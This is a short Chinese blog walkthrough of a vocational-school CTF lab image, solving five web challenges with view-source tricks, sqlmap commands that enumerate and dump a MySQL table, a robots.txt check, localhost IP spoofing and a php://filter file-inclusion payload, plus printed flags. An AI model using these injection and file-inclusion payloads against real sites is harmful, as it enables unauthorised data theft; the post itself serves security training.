PYsystem003 中职网络安全

最新推荐文章于 2024-01-28 14:29:18 发布
最新推荐文章于 2024-01-28 14:29:18 发布
阅读量2.5k 收藏 10
点赞数 2
分类专栏: 网络空间安全 文章标签: php mysql 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zx66661/article/details/123566941
版权

1ip/1

F12被禁用,有两种解法

解法一:进入第二题,F12,

F12不退,换回第一题

解法二:新建网址,查看网页源代码

Flag{fc35fdc70d5fc69d269883a822c7a53e}

2.ip/2

直接sqlmap –u 网址 –forms –dbs

发现mysql数据库

sqlmap -u 网址--forms -D mysql --tables

sqlmap –u 网址 --forms -D mysql -T 'comehere!!!' --dump

3.ip/3

看到这里在后面添加后缀 robots.txt试一试

4.ip/4

本地用户ip:127.0.0.1

抓包

flag{c71b47723409ac75d3e6b28f78b372ce}

5.ip/5

http://172.16.103.250/5/?file=php://filter/read=convert.base64-encode/resource=index.php

看到flag.php , 修改网址后缀

http://172.16.103.250/5/?file=php://filter/read=convert.base64-encode/resource=flag.php

修改之后会发现第二个base64码,echo 破解 得flag

一本正经光头强
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021全国职业技能大赛浙江省杭州市“网络空间安全赛项”赛题及赛题解析(超详细)
Aluxian_的博客
12-08 3893
一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录和密码策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。 二、服务器环境说明 LOG:日志服务器(Splunk),操作系统为Linux 用户名:root密码:root Web:IIS服务器,操作系统为Windows 用户名:administrator密码:P@ssw0rd
中职网络安全隐写术应用
12-19
文章地址https://blog.csdn.net/qq_45894840/article/details/124423375 免费下载
PYsystem0033
最新发布
ftxyz23的博客
01-28 542
查看到有一个漏洞,我们去找到这个漏洞位置,同样scp上传,如果你的Kali开启了http服务,还可以把源码复制到你的/var/www/html目录下,在msf里用wget下载,由于我的kali没有,就只演示scp了。对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;木马已经上传到了靶机中,打开msf,开启监听,得到会话。2. 通过上述端口访问。
中职网络安全-PYsystem003.img(环境+解析)
m0_46056107的博客
11-25 235
需要环境私信我
中职网络安全操作系统渗透
m0_71635568的博客
11-30 1254
中职网络安全系统漏洞渗透
中职网络安全2021年江苏省系统漏洞利用与提权赛题
qq_57147160的博客
12-29 2764
任务二:系统漏洞利用与提权 任务环境说明: 服务器场景:PYsystem0033 服务器场景操作系统:Ubuntu 服务器场景用户名:未知 密码:未知 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交;(1分) 首先第一道题目的思路就是使用nmap来进行扫描: Flag:[21,22,80] 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;(1分) 看到弱.
Linux操作系统渗透
JJH2724719395的博客
04-15 541
linux操作系统渗透
中职网络安全数据分析包infiltration.pacapng
10-11
中职网络安全数据分析包infiltration.pacapng
中职网络安全C模块脚本.rar
06-09
中职网络安全python脚本 新规程C模块的脚本,有mysql、vsftpd和ping三个脚本,三个脚本结合使用渗透靶机获取flag,mysql、vsftpd都是linux渗透linux的,ping是windows和linnux都可使用,如购买有问题可私信博主
中职网络安全之results数据包
03-03
中职技能大赛wireshark流量分析-results数据包
2022年湖南省中职网络安全技能竞赛
04-06
赛题加解析和环境
2021年江苏省职业院校技能大赛中职 “网络信息安全”赛项(超详细)
Aluxian_的博客
12-30 2281
2021年中职组“网络空间安全”赛项一.江苏省竞赛任务书二.任务书解析:三.不懂的可以私信博主! 一.江苏省竞赛任务书 一、竞赛时间 8:00—11:00 共计3小时 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第①阶段: 单兵模式系统渗透测试 任务一: 攻击日志分析 任务二: 系统漏洞利用与提权 任务三: 代码审计 任务四: web安全渗透测试 任务五: Linux操作系统渗透测试 任务六: 端口扫描Python渗透测试 备战阶段 休息20分钟 第②阶段: 分组对抗 系统加固 15分钟
2021年江苏省中职组“网络空间安全”赛项
m0_45155797的博客
04-05 169
2021年江苏省中职组“网络空间安全”赛项 镜像名:PYsystem0040 操作有什么问题,麻烦师傅们指出!
2023年网络安全竞赛B模块专项练习题(ALL)
旺仔Sec&blog
06-02 3536
中职网络安全技能竞赛B模块任务汇总合集
2021年中职网络安全“江西省赛题—B-1:系统漏洞利用与提权
weixin_57060854的博客
05-23 4803
B-1:系统漏洞利用与提权 任务环境说明:  服务器场景:PYsystem001  服务器场景操作系统:Ubuntu(显示链接)  服务器用户名:未知 密码:未知 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交; 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交; 利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;
Python Basic - subprocess模块,让python在主机上执行相应的shell命令
HuangFei
09-25 325
文章目录简介主要的方法run()方法示例一:Popen接口(subprocess的核心)Popen的介绍示例一:创建一个子进程,然后执行一个简单的命令示例运行并结果输出Popen的子方法subprocess.PIPE 简介 subprocess 是一个允许python在主机上运行一个子进程,该子进程可以去与该计算机通过 == “输入” “输出”“错误输出”“管道” ==等与计算机进行交互,并将此子进程获取的命令执行的返回值返回给主进程。总结一句话就是,子进去去执行命令,然后将结果返回给主进程进行进一步的处理
python教程22-导入模块的几种方式、os模块、sys模块、math模块、random模块、datetime模块等的使用
zjl_xiaoliu的博客
10-30 795
python教程_小白入门2020/10/29 学习目标 P135 导入模块的5种方式 #  导入模块的方法 # @author :zhangjiong # 在python里,一个py文件就可以理解为一个模块 # 不是所有的py文件都可以作为模块被导入的 # 要想一个py文件能够被导入,模块的名字必须要遵守命名规则 # python为了便于程序员开发,提供了很多内置模块 # 导入方式1:使用inport + 模块名的方式进行导入(使用的最多的一个导入方式) import time # 导入模块以后,就可
2019年 网络空间安全国赛真题 赛题分析
热门推荐
正在成为 code ape
08-23 2万+
2019年全国职业院校技能大赛中职组 “网络空间安全”赛卷八 没有错,国赛用的就是赛卷八 一、竞赛阶段 题目与实际环境差别还是蛮大的,可以说给你题目,没有环境你也不会做滴 PC机环境: 物理机:Windows7;(外机已经开启防火墙) 虚拟机1:Ubuntu Linux 32bit(用户名:root;密码:123456),安装工具集:Backtrack5,安装开发环境:Python3; 虚拟机2...
中职网络安全pe01
09-19
中职网络安全PE01是指中等职业学校网络安全专业的第一门课程,以下是对该课程的回答: 中职网络安全PE01课程主要培养学生对网络安全基本知识和技能的理解与掌握。通过学习本课程,学生将了解到网络安全的基本概念,掌握网络安全的基本原理和方法,以及掌握并运用网络安全相关工具与技术。 在本课程中,学生将学习网络安全的重要性和意义,了解网络安全的威胁和风险,包括计算机病毒、网络钓鱼、黑客攻击等。学生还将学会识别和评估网络安全漏洞,并学习如何采取相应的防护措施以保护网络和信息的安全。 此外,中职网络安全PE01课程还将培养学生的实践能力。学生将学习并运用网络安全测试工具,包括漏洞扫描器、入侵检测系统等。他们将通过实际操作和模拟实战来分析网络安全问题,并提出相应的解决方案。 本课程还将提供网络安全实践案例分析,让学生了解实际应用中的网络安全挑战,并通过分析案例来培养学生的解决问题的能力。学生在学习过程中将参与团队合作和实践项目,培养他们的沟通协作能力和创新思维。 综上所述,中职网络安全PE01课程通过理论与实践相结合的教学方式,旨在培养学生对网络安全的理解和掌握,提高他们的网络安全意识和能力,为他们未来从事网络安全相关工作打下坚实的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值